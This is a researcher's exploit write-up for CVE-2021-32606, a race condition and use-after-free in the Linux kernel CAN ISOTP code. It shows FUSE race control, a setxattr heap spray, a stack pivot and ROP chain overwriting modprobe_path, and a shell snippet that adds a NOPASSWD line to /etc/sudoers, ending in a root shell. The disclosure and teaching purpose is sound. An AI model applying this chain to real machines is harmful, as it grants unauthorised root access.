This article is about a recent vulnerability in the linux kernel labeled CVE-2021-32606. The vulnerable part of the kernel was the ISOTP CAN networking protocol in the CAN networking subsystem. In the following, I am going to cover the vulnerability and my exploitation approach which led to successful local privilege escalation to root.
The vulnerability is a race condition which allowed to modify socket options after the socket was
bound. For this reason, the race condition occurs between isotp_setsockopt()
and isotp_bind()
.
In the case of the CAN ISOTP protocol, if socket options other than default shall be used,
the new socket options have to be accordingly set with isotp_setsockopt()
before binding the socket.
Especially with the introduction of CAN_ISOTP_SF_BROADCAST support in commit 921ca574cd38
, no
further change of socket options is allowed, as this might result in other socket behavior than
previously expected.
Every ISOTP socket has the following struct can_isotp_options
which can be changed
with isotp_setsockopt()
.
struct can_isotp_options {
__u32 flags; /* set flags for isotp behaviour. */
...
When an ISOTP socket is about to be bound in isotp_bind()
, the flags
are checked against
CAN_ISOTP_SF_BROADCAST
. In case CAN_ISOTP_SF_BROADCAST
is set, no CAN receiver will be
registered. A CAN receiver is a feature which will be automatically run as a software interrupt in
order to receive incoming CAN messages.
static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
{
...
/* do not register frame reception for functional addressing */
if (so->opt.flags & CAN_ISOTP_SF_BROADCAST)
do_rx_reg = 0;
...
if (do_rx_reg)
can_rx_register(net, dev, addr->can_addr.tp.rx_id,
SINGLE_MASK(addr->can_addr.tp.rx_id),
isotp_rcv, sk, "isotp", sk);
...
so->bound = 1;
...
Above in isotp_bind()
, we can see that can_rx_register()
won't be called if
CAN_ISOTP_SF_BROADCAST
is not set. In isotp_setsockopt()
, we can either set or remove this flag.
The following excerpt shows isotp_setsockopt()
from net/can/isotp.c
static int isotp_setsockopt(struct socket *sock, int level, int optname,
sockptr_t optval, unsigned int optlen)
{
struct sock *sk = sock->sk;
struct isotp_sock *so = isotp_sk(sk);
int ret = 0;
if (level != SOL_CAN_ISOTP)
return -EINVAL;
if (so->bound) [1]
return -EISCONN;
switch (optname) {
case CAN_ISOTP_OPTS:
if (optlen != sizeof(struct can_isotp_options))
return -EINVAL;
if (copy_from_sockptr(&so->opt, optval, optlen)) [2]
return -EFAULT;
break;
...
If the socket is already bound [1]
, we return from the function earlier, as we cannot modify the
socket options of a bound socket.
In case the socket is not bound, struct can_isotp_options
will be copied [2]
from user space.
Now consider the following race condition between isotp_setsockopt()
and isotp_bind()
:
-
isotp_setsockopt()
is called and we pass the check at[1]
since the socket is unbound. -
isotp_bind()
is by default called withoutCAN_ISOTP_SF_BROADCAST
, resulting in the registration of a CAN receiver. In the end,so->bound
will be set to1
. -
The socket was just bound but we are still in
isotp_setsockopt()
. If the timing is right, we will changestruct can_isotp_options
withflags
set toCAN_ISOTP_SF_BROADCAST
. Notice that the copy[2]
will happen on an already bound socket.
At this place, we now have a socket with a registered CAN receiver, but according to its newly
set flags
to CAN_ISOTP_SF_BROADCAST
, this shouldn't have happened.
After a successful race condition, we now close the socket and isotp_release()
is called.
static int isotp_release(struct socket *sock)
{
...
/* remove current filters & unregister */
if (so->bound && (!(so->opt.flags & CAN_ISOTP_SF_BROADCAST))) { [1]
if (so->ifindex) {
struct net_device *dev;
dev = dev_get_by_index(net, so->ifindex);
if (dev) {
can_rx_unregister(net, dev, so->rxid, [2]
SINGLE_MASK(so->rxid),
isotp_rcv, sk);
dev_put(dev);
}
}
}
...
The check at [1]
assures that the CAN receiver will be unregistered if flags
weren't set to
CAN_ISOTP_SF_BROADCAST
.
But because we illegally changed flags
after binding the socket, it is now assumed that we
didn't register a CAN receiver so none will be unregistered.
At this place, we now have closed the ISOTP socket, but we still have a registered CAN receiver.
In case another socket sends messages to our previously freed socket, a softirq will call isotp_rcv()
on the freed struct isotp_sock
, resulting in use-after-free.
In order to allow successful exploitation, the following conditions are required:
-
The kernel needs to come with config option
CONFIG_USER_NS
enabled. This option is needed to set up a sandbox for the unprivileged user, allowing to autoload VCAN and ISOTP modules. The first is needed to set up a CAN networking device for our ISOTP sockets, and the latter is needed to create the aforesaid sockets. -
An infoleak is needed in order to bypass KASLR and to get the address of the GS register. The usage of the latter will be explained soon. In my case, I could trigger a kernel warning which would effectively display the Oops message in kernel logs. Kernel logs can be read on distributions which haven't restricted access to dmesg via
CONFIG_SECURITY_DMESG_RESTRICT
.
Exploitation is possible on machines with SMEP, SMAP, KASLR and KPTI enabled.
For this particular exploit, I originally wanted to use the userfault technique to reliably control the race condition. Due to userfault being recently disabled, I looked for other possibilities and stumbled upon a technique which was used by Jann Horn to control a race condition, in the past. I think because of userfault working well in the past, this technique might have not been frequently used as much, but it's still a worthy approach to make this particular exploit reliable.
One of the drawbacks of the FUSE technique I see is that it might not come preinstalled on some distributions. On OpenSUSE Tumbleweed with XFCE desktop FUSE came preinstalled and was accessible to unprivileged users. Repeated tests have shown, that there is still a good chance to exploit this vulnerability without FUSE or userfault, but the reliability would potentially be decreased.
In short, FUSE stands for Filesystem in Userspace and allows to mount self-made filesystems in a user-controlled directory. For this exploit, I used a template filesystem from libfuse called ``hello` which was modified to be effectively used in this exploit.
The following excerpt shows the hello_read()
function from the hello filesystem
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi)
{
/* wait inside isotp_setsockopt() */
sleep(2);
int flags = CAN_ISOTP_SF_BROADCAST;
struct can_isotp_options opts;
size_t len = sizeof(opts);
memset(&opts, 0, sizeof(opts));
opts.flags = flags;
if (offset < len) {
if (offset + size > len)
size = len - offset;
memcpy(buf, &opts + offset, size);
} else {
size = 0;
}
return size;
}
In this case, any read associated with the hello filesystem will be redirected to hello_read()
.
Inside hello_read()
, we sleep()
for 2 seconds, effectively halting the kernel execution at
copy_from_sockptr()
in isotp_setsockopt()
.
if (copy_from_sockptr(&so->opt, optval, optlen))
return -EFAULT;
In the meanwhile, isotp_bind()
will finish and bind the socket, finally setting so->bound
to 1
.
Then, we proceed with copying flags containing CAN_ISOTP_SF_BROADCAST
to the kernel space.
void setup_fusefs(void)
{
fuse_fd = open("mnt/hello", O_RDWR); [1]
if (fuse_fd < 0)
die("failed to open fuse fd");
fuse_map = mmap(NULL, sizeof(struct can_isotp_options),
PROT_READ | PROT_WRITE, MAP_SHARED, fuse_fd, 0); [2]
if (fuse_map == MAP_FAILED)
die("failed to map with fuse fs");
}
In my exploit, I get a fd of the filesystem [1]
and mmap memory [2]
similarly to userfault.
This mmap()
will be associated with the previously opened fuse_fd
. As already mentioned,
any copy from the kernel space from this mmap'ed memory will be handled by hello_read()
.
At this point, we have a properly set up FUSE filesystem which will help us to reliably win the race
condition between isotp_setsockopt()
and isotp_bind()
.
How does the controlled race condition scenario look like?
-
isotp_setsockopt()
is called on an unbound socket.copy_from_sockptr()
wants to copystruct can_isotp_options
from the user spacehello_read()
is called and goes tosleep()
for 2 seconds, kernel execution is now halted!
-
while we are in
setsockopt()
, we now callisotp_bind()
CAN_ISOTP_SF_BROADCAST
flag is not set, so a CAN receiver will be registered- return from
isotp_bind()
, the socket is now successfully bound
-
during the 2 seconds
isotp_setsockopt()
was halted, we expectisotp_bind()
to be completedmemcpy()
insidehello_read()
will now copy the struct to kernel space- we set the
CAN_ISOTP_SF_BROADCAST
flag for a bound socket!
As already mentioned, closing the socket won't unregister the CAN receiver and we cause a few
use-after-free's inside isotp_rcv()
whenever we send a message to the freed socket.
My approach focuses on spraying the freed struct isotp_sock
so we can reliably pass the
checks in isotp_rcv()
and call an overwritten function pointer. Because the struct is pretty big
(on my machine it was 17432 bytes) and exceeds the biggest kmalloc cache kmalloc-8k
,
it won't be allocated in any of the generic SLAB caches.
Instead, the page allocator will allocate it.
Looking after a feasible spray primitive, I ended up with choosing setxattr()
. This syscall
was mainly used in combination with userfault, as setxattr()
frees the buffer right after copying
it. In fact, we could probably hold it with FUSE, but after repeated tests I noticed that setxattr()
alone is also very reliable in this case. The most important thing with this approach is that setxattr()
does not erase the buffer after freeing it, so the previously copied bytes will remain in memory.
Theoretically, some other object could be allocated right after we sprayed the freed socket, but in practice it does not provoke any crashes and in the worst case we can simply rerun the exploit and try again. In the following, I will explain this further.
static void isotp_rcv(struct sk_buff *skb, void *data)
{
/* Strictly receive only frames with the configured MTU size
* => clear separation of CAN2.0 / CAN FD transport channels
*/
if (skb->len != so->ll.mtu) [1]
return;
...
switch (n_pci_type) {
...
case N_PCI_SF:
/* rx path: single frame
*
* As we do not have a rx.ll_dl configuration, we can only test
* if the CAN frames payload length matches the LL_DL == 8
* requirements - no matter if it's CAN 2.0 or CAN FD
*/
/* get the SF_DL from the N_PCI byte */
sf_dl = cf->data[ae] & 0x0F;
if (cf->len <= CAN_MAX_DLEN) {
isotp_rcv_sf(sk, cf, SF_PCI_SZ4 + ae, skb, sf_dl); [2]
...
In the beginning of isotp_rcv()
, the length of the received sk_buff
is checked against so->ll.mtu
.
The skb->len
of the received message is by default 16
, so
so->ll.mtu
also has to be 16
. If this is not the case, we return from the function.
Because we control the whole struct isotp_sock
with the setxattr()
spray,
we can set so->ll.mtu
to 16
. This is also why this seemingly unreliable spraying approach is
still very reliable: In case the spray will fail, it's very unlikely that isotp_rcv()
will read
exactly 16
at the position of so->ll.mtu
. For any rubbish value other than 16
, we will safely
return from isotp_rcv()
and we can try again.
After the initial check [1]
, isotp_rcv_sf()
will be called [2]
to receive a so-called CAN
single frame message in case the message length is <= 8.
static int isotp_rcv_sf(struct sock *sk, struct canfd_frame *cf, int pcilen,
struct sk_buff *skb, int len)
{
...
hrtimer_cancel(&so->rxtimer); [1]
so->rx.state = ISOTP_IDLE;
...
if ((so->opt.flags & ISOTP_CHECK_PADDING) && [2]
check_pad(so, cf, pcilen + len, so->opt.rxpad_content)) {
/* malformed PDU - report 'not a data message' */
sk->sk_err = EBADMSG;
if (!sock_flag(sk, SOCK_DEAD))
sk->sk_error_report(sk); [3]
return 1;
}
At [1]
, one of the hrtimers is cancelled by calling hrtimer_cancel()
. I won't cover hrtimers
in this article in detail. All you have to know is that we need to overwrite the freed socket's memory
in the place of so->rxtimer.base
in order to prevent kernel crashes. struct hrtimer
has a
pointer to struct hrtimer_clock_base
. hrtimer_clock_base
is defined per CPU core.
Fortunately, the abovementioned GS
register holds the address of one of the core's per-CPU data,
and adding a constant offset to this address will give us a valid struct hrtimer_clock_base
.
After a couple of checks in hrtimer_cancel()
, the socket's flags are checked [2]
against
ISOTP_CHECK_PADDING
. These flags are exactly the ones where CAN_ISOTP_SF_BROADCAST
is
stored. We can provide this flag along with some other flags needed in check_pad()
.
The combination of the user-controlled message length and the padding flags results in the message
being seen as malformed. Accordingly, the socket will call sk_error_report()
[3]
to report this issue.
Just like we can control any single byte of struct isotp_sock
, it's also possible to
overwrite the sk_error_report()
pointer. At this point, we have successfully managed to achieve
arbitrary kernel execution.
One may ask, where are we supposed to forward the execution? Jumping to invalid places led to a
kernel panic, but then I noticed that the RDI
register stored the address of our freed struct isotp_sock
. I decided to perform a stack pivot to this address and start executing ROP gadgets. In
order to take use of the ROP gadgets found in the vmlinux image, I use the leaked KASLR offset from
the warning in kernel logs.
When I assembled the ROP chain, I took into account that the space might not be enough and eventually
some important data might be overwritten. Because of that, I almost immediately moved the stack
pointer somewhere in the middle of the sprayed target where no data would explicitly be used by
isotp_rcv()
. This is possible because of the large size of struct isotp_sock
which makes it
feasible to place the payload inside the object.
In this example, I place my extended ROP chain at offset 0x718.
/* overwrite sk_error_report() (offset 0x2b8) with stack pivot */
dst = (uint64_t *)(p + 0x2b8);
*dst = ROP_PUSH_RDI__JUNK__POP_RSP__RET + kaslr_offset;
/* ROP at isotp_sock + 0x8 */
*dst = ROP_RET_0x700 + kaslr_offset;
dst++;
/* jump to extended rop chain at isotp_sock + 0x10 */
*dst = ROP_RET + kaslr_offset;
/* extended rop chain */
rop = (uint64_t *)(p + 0x718);
*rop++ = ROP_POP_RAX__RET + kaslr_offset;
*rop++ = 0x782f706d742f; /* /tmp/x */
*rop++ = ROP_POP_RCX__RET + kaslr_offset;
*rop++ = MODPROBE_PATH + kaslr_offset;
*rop++ = ROP_MOV_RAX_INTO_RCX__RET + kaslr_offset;
*rop++ = ROP_POP_RAX__RET + kaslr_offset;
*rop++ = DO_TASK_DEAD + kaslr_offset; [1]
*rop++ = ROP_JMP_RAX + kaslr_offset;
The following image shows the sprayed target to overwrite struct isotp_sock
The ROP chain consists of a technique to overwrite modprobe_path
. In case any user wants to execute
a file with an invalid file signature, the program at modprobe_path
will be executed with root privileges.
This technique was apparently used in some CTF challenges and it was thoroughly described by lkmidas
in his blog. In case you want to learn about it in depth, check out his well-written article.
Once we have overwritten modprobe_path
, the kernel thread will be stopped in do_task_dead()
[1]
.
This step is needed as we are already done with exploiting the kernel, and any further
execution of our hijacked kernel thread might result in severe kernel crashes.
ret = system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy; [1]
chmod +x /tmp/dummy");
if (ret != 0)
die("/tmp/dummy creation failed");
ret = system("echo '#!/bin/sh' > /tmp/x; \
echo 'echo \"noprivs ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers' [2]
>> /tmp/x; chmod +x /tmp/x");
if (ret != 0)
die("/tmp/x creation failed");
In short, I create a file /tmp/dummy
[1]
with the invalid signature 0xff 0xff 0xff 0xff
.
I also create a file /tmp/x
[2]
which is the overwritten modprobe_path
. This small
shell script will add the unprivileged user to /etc/sudoers
, allowing to escalate the user's
privileges to root.
At this place, I covered all of the steps which now have to be combined. The following sequence is used in my exploit:
-
trigger warning to retrieve kernel addresses from kernel logs
-
setup FUSE filesystem and allocate memory with
mmap()
-
setup user namespace to autoload VCAN and ISOTP modules
-
setup CAN networking device with VCAN
-
open ISOTP socket 1
- this socket will be exploited with the race condition
-
open ISOTP socket 2
- this socket will only be used to send a CAN message to socket 1
-
win race condition on socket 1
-
close socket 1
-
spray the page allocator with
setxattr()
containing our payload to overwrite socket 1 -
send CAN message from socket 2 to socket 1
-
isotp_rcv()
is run as software interrupt for socket 1 -
in
isotp_rcv()
, pass checks and call malicioussk_error_report()
pointer to perform the stack pivot -
stack pivot leads to ROP chain execution at
struct isotp_sock
-
execute extended ROP chain, overwrite
modprobe_path
-
try executing
/tmp/dummy
,/tmp/x
will be executed with root privileges -
the unprivileged user is now added to
/etc/sudoers
and we can now get a root shell
Exploit output
noprivs@suse:~/expl> uname -a
Linux suse 5.12.0-1-default #1 SMP Mon Apr 26 04:25:46 UTC 2021 (5d43652) x86_64 x86_64 x86_64 GNU/Linux
noprivs@suse:~/expl> ./lpe
[+] entering setsockopt
[+] entering bind
[+] left bind with ret = 0
[+] left setsockopt with flags = 838
[+] race condition hit, closing and spraying socket
[+] sending msg to run softirq with isotp_rcv()
[+] check sudo su for root rights
noprivs@suse:~/expl> sudo su
suse:/home/noprivs/expl # id
uid=0(root) gid=0(root) groups=0(root)
Researching and exploiting the vulnerability was a great opportunity to expand my knowledge about the Linux kernel. I hope you enjoyed the article. In case of further questions feel free to reach out to me by writing me an e-mail ([email protected]).
Also, I'm currently looking for an internship in infosec in Germany/Europe. In case you are interested, please reach out to me via e-mail.
https://bugs.chromium.org/p/project-zero/issues/detail?id=808
https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/